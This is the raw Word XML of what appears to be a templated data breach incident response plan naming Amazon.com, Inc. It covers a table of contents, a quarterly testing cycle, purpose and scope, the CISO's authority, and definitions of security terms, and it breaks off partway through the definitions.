        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="400" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Amazon.com, Inc]</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="138"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="400" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">DATA BREACH</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="138"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="400" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Response Plan</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br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents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1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Revision History</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">3</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Testing &amp; Review Cycle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">5</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Purpose &amp; Scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">6</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Authority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">7</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Definitions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">8</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How to Recognize a Cyber Incident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">11</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Cyber Security Incident Response Team (CSIRT)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">13</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Incident Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">19</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Severity Matrix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">20</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Incident Handling Process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">22</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Approvals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">26</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">27</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16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br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>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Revision History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Incident Response Plan has been modified as follows:</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468"/>
        <w:gridCol w:w="1483"/>
        <w:gridCol w:w="3073"/>
        <w:gridCol w:w="1993"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>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Date</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Version</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Modification</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Modifier</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000000" w:sz="5" w:space="0"/>
              <w:right w:val="single" w:color="44546a"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9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Testing &amp; Review Cycle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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Quaterly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> testing of the Data Breach Incident Response Plan is necessary to ensure the CSIRT (Cyber Security Incident Response Team) is aware of its obligations. Unless real incidents occur, which test the full functionality of the process, this can be achieved usi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ng walkthroughs and practical simulations of potential incidents.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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The Data BreachIncident Response Plan will be tested at least once </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">every 90 days.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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The Data Breach Incident Response Plan Testing will test your business response to potential incidents, identifying process gaps and improvement areas.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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The CSIRT will record observations made during the testing, such as steps that were poorly executed or misunderstood by participants and aspects that need improvement.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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The Incident Handler will ensure the Security Incident Response Plan is updated and distributed to CSIRT members.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280" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary: Data Breach Incident Response Plan for Amazon.com, Inc.</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rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Breach Incident Response Plan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Amazon.com, Inc. provides a comprehensive framework to address, mitigate, and recover from cybersecurity incidents. Leveraging the NIST framework, the plan ensures the organization is prepared to handle increasingly sophisticated cyber threats while s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">afeguarding customer data and maintaining business continuity.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>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Purpose &amp; Scope</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Purpose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Data Breach Incident Response Plan exists to ensure Amazon.com, Inc. is prepared to manage Data breach cyber incidents in an effective and efficient manner. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber security incidents are more frequent and sophisticated than ever. No organization globally is immune to attack (National Institute of Standards and Technology [NIST], 2012</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Organizations must ensure they are prepared to detect, prevent, and respond to incidents. By having a plan, a team, and conducting exercises, we will be better prepared to respond inevitable incidents. In addition, we will be able to contain the damage a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">nd mitigate further risk to the organization. Resources must be deployed in an organized fashion with exercised skills and communication strategies.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document describes the overall plan for responding to Cyber Security Incidents at Amazon.com, Inc. It identifies the structure, roles and responsibilities, types of common incidents, and the approach to preparing, identifying, containing, eradicating,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> recovering, and conducting lessons learned in order to minimize the impact of cyber security incidents.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goal of the Incident Response Plan is to ensure Amazon.com, Inc. is organized to respond to cyber security incidents effectively and efficiently.</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Scope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Data Breach Incident Response Plan applies to our networks, systems, and data, and stakeholders (for example, employees, contractors, 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">rd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> party vendors) that access them. Members of the organization who are part of the Cyber Security Incident Response Team (CSIRT) are expected to lead or participate in a cyber incidence response. CSIRT members must familiarize themselves with this plan and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">be prepared to collaborate, with the goal of minimizing adverse effects on the organization.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document establishes incident handling and incident response capabilities and determines the appropriate response for common cyber security incidents. This document is not intended to provide a detailed list of all activities that should be performed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">in combatting cyber security incidents.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Authority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Responsibility for the security of company and customer information resides with the Chief Executive Officer (CEO). During times when a high or critical cyber security incident is underway, this responsibility is entrusted to the Chief Information Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Officer (CISO)</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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="yellow"/>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br/>
        <w:br/>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Definitions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Acceptable interruption window </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">in business continuity planning, is the amount of time in which basic functionality must be restored for critical systems. It is a major factor when planning a disaster recovery solution.</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Confidentiality</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">is a classification of data that typically refers to personally identifiable information. It may include such things as social insurance numbers, drivers licence numbers, etc.</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Cyber Security Event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">is an observable occurrence in a system or network. Events include a user connecting to a file share, a server receiving a request for a web page, or a user sending email.</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Cyber Security Incident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">is any incident that occurs by accident or deliberately that impacts communications or information processing systems. An incident may be any event or set of circumstances that threatens the confidentiality, integrity or availability of information, data o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">r services within Amazon.com. This includes unauthorized access to, use, disclosure, modification, or destruction of data or services used or provided by Amazon.com.</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Denial of Service (attack)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">also known as a DoS attack, seeks to make a remote service unavailable to its intended users by flooding its host with superfluous requests, thereby overloading the system.</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Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">in cyber security terms is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic.</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Indicators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">also known as “Indicators of Compromise” or IOCs, are forensic clues or symptoms left behind by cybersecurity attacks or breaches in the company’s network or systems. These clues are sometimes found in log entries, files, or databases.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Integrity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">refers to the maintenance or assurance of data accuracy, consistency, and its accessibility to authorized users for its entire life-cycle.</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Maximum tolerable downtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">in business continuity planning, this specifies the maximum period of time that a given business process can be inoperative before the organization’s survival is at risk.</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Response playbook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">introduces prescriptive cyber security measures and best practices that can be implemented to improve the organization’s security profile. This playbook provides a set of standards to reference the organization, improves current systems and implement new o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
